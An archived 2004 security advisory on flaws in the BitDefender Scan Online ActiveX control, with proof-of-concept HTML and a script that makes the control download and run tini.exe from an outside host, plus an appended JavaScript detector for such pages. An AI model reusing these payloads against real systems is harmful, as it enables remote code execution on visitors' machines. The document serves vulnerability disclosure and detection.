[NT] Multiple Vulnerabilities in BitDefender Scan Online (ActiveX)
From: SecuriTeam (support_at_securiteam.com)
Date: 04/21/04
To: list@securiteam.com Date: 21 Apr 2004 19:53:19 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Multiple Vulnerabilities in BitDefender Scan Online (ActiveX)
------------------------------------------------------------------------
SUMMARY
"BitDefender Scan Online <http://www.bitdefender.com/scan/Msie/index.php>
is a fully functional AntiVirus product, with a web-based interface and
featuring all required elements for remotely AntiVirus scanning and
cleaning: it scans system's memory, all files, folders and drives' boot
sector, providing the user with the option to automatically clean the
infected files."
Due to unsafe behavior of some of BitDefender's objects, malicious HTML
can disclose sensitive information and can download and execute any file
the attacker chooses.
DETAILS
Vulnerable Systems:
* BitDefender Scan Online 7.2
BitDefender installs and registers the following COM/ActiveX objects:
"AVXSCANONLINE.AvxScanOnlineCtrl.1"
With the following CLSID: 80DD2229-B8E4-4C77-B72F-F22972D723EA
Properties of the objects are not accessible by using the following
script:
object = new ActiveXObject("AVXSCANONLINE.AvxScanOnlineCtrl.1")
However, using the following script the object's properties and methods
can be accessed:
<0BJECT id=mymy
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
BitDefender allows disclosure of all file system objects (files and
directories) using the following HTML:
------------------- CUT HERE -------------------
<0BJECT id=seemycomputer
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></0BJECT>
------------------- CUT HERE -------------------
Another BitDefender function allows a remote attacker to cause the program
to download and execute a file on the system:
object.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\");
The following proof of concept code will download a file from the Internet
and execute it on the machine:
------------------- CUT HERE -------------------
<0BJECT id=mymy
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="Id" VALUE="Trusted">
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></object>
<scr!pt>
var a;
function cool() {
mymy.Update();
mymy.Updating(1);
mymy.SetCountry("Israel");
mymy.EnableRtvr(1);
mymy.SetupMode = true;
mymy.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\");
}
setTimeout("cool()", 1500);
</scr!pt>
------------------- CUT HERE -------------------
Solution:
The vendor has issued a new version of this ActiveX that doesn't contain
the above vulnerabilities. To upgrade to the new version, access the
company's web site and request an online scan.
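To find pages that script the vulnerable control, saved or proxy-captured HTML can be checked statically. The following is an added example, not part of the original advisory: a Node.js function (scanHtml, a hypothetical name) that flags OBJECT tags carrying the CLSID above, instantiation by ProgID, and RequestFile calls. The sample pages, their ids and the URL are constructed placeholders.

```javascript
// Added example (not from the advisory): static check of HTML for the control above.
const CLSID = "80DD2229-B8E4-4C77-B72F-F22972D723EA"; // CLSID given in the advisory
const PROGID = "AVXSCANONLINE.AvxScanOnlineCtrl";     // ProgID given in the advisory

function scanHtml(html) {
  const findings = [];
  const ids = new Set();
  // [o0] also matches the defanged "0BJECT" spelling used in archived copies.
  for (const [tag] of html.matchAll(/<[o0]bject\b[^>]*>/gi)) {
    const cls = /classid\s*=\s*["']?\s*clsid:\s*\{?([0-9a-f-]{36})/i.exec(tag);
    if (!cls || cls[1].toUpperCase() !== CLSID) continue;
    const id = /\bid\s*=\s*["']?([\w$-]+)/i.exec(tag);
    if (id) ids.add(id[1].toLowerCase());
    findings.push({ type: "control-embedded", id: id ? id[1] : null });
  }
  // Script-side instantiation by ProgID (with or without the ".1" version suffix).
  const progRe = new RegExp(
    "ActiveXObject\\s*\\(\\s*[\"']" + PROGID.replace(/\./g, "\\.") + "(\\.\\d+)?[\"']", "i");
  if (progRe.test(html)) findings.push({ type: "progid-instantiated" });
  // Calls to RequestFile(url, dir); record whether the receiver is an embedded control id.
  const callRe = /([\w$]+)\s*\.\s*RequestFile\s*\(\s*(["'])(.*?)\2/gi;
  for (const m of html.matchAll(callRe)) {
    findings.push({
      type: "requestfile-call",
      receiver: m[1],
      url: m[3],
      onEmbeddedControl: ids.has(m[1].toLowerCase()),
    });
  }
  return findings;
}

// Constructed sample page; the id and URL are placeholders, not values from the advisory.
const SAMPLE = `
<object id="scanctl" classid="clsid:80dd2229-b8e4-4c77-b72f-f22972d723ea" width=405 height=180></object>
<script>
  function go() { scanctl.RequestFile("http://example.invalid/sample.bin", "c:\\\\"); }
</script>`;

// Constructed page embedding an unrelated (all-zero, placeholder) CLSID.
const BENIGN = `<object id="other" classid="clsid:00000000-0000-0000-0000-000000000000"></object>`;

console.log(scanHtml(SAMPLE));
console.log(scanHtml(BENIGN));
```

Static matching misses script that assembles the call dynamically, so a clean result does not prove a page leaves the control alone.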
ADDITIONAL INFORMATION
The information has been provided by Rafel Ivgi, The-Insider
<theinsider@012.net.il> and Sami POTIRCA <spotirca@bitdefender.com>.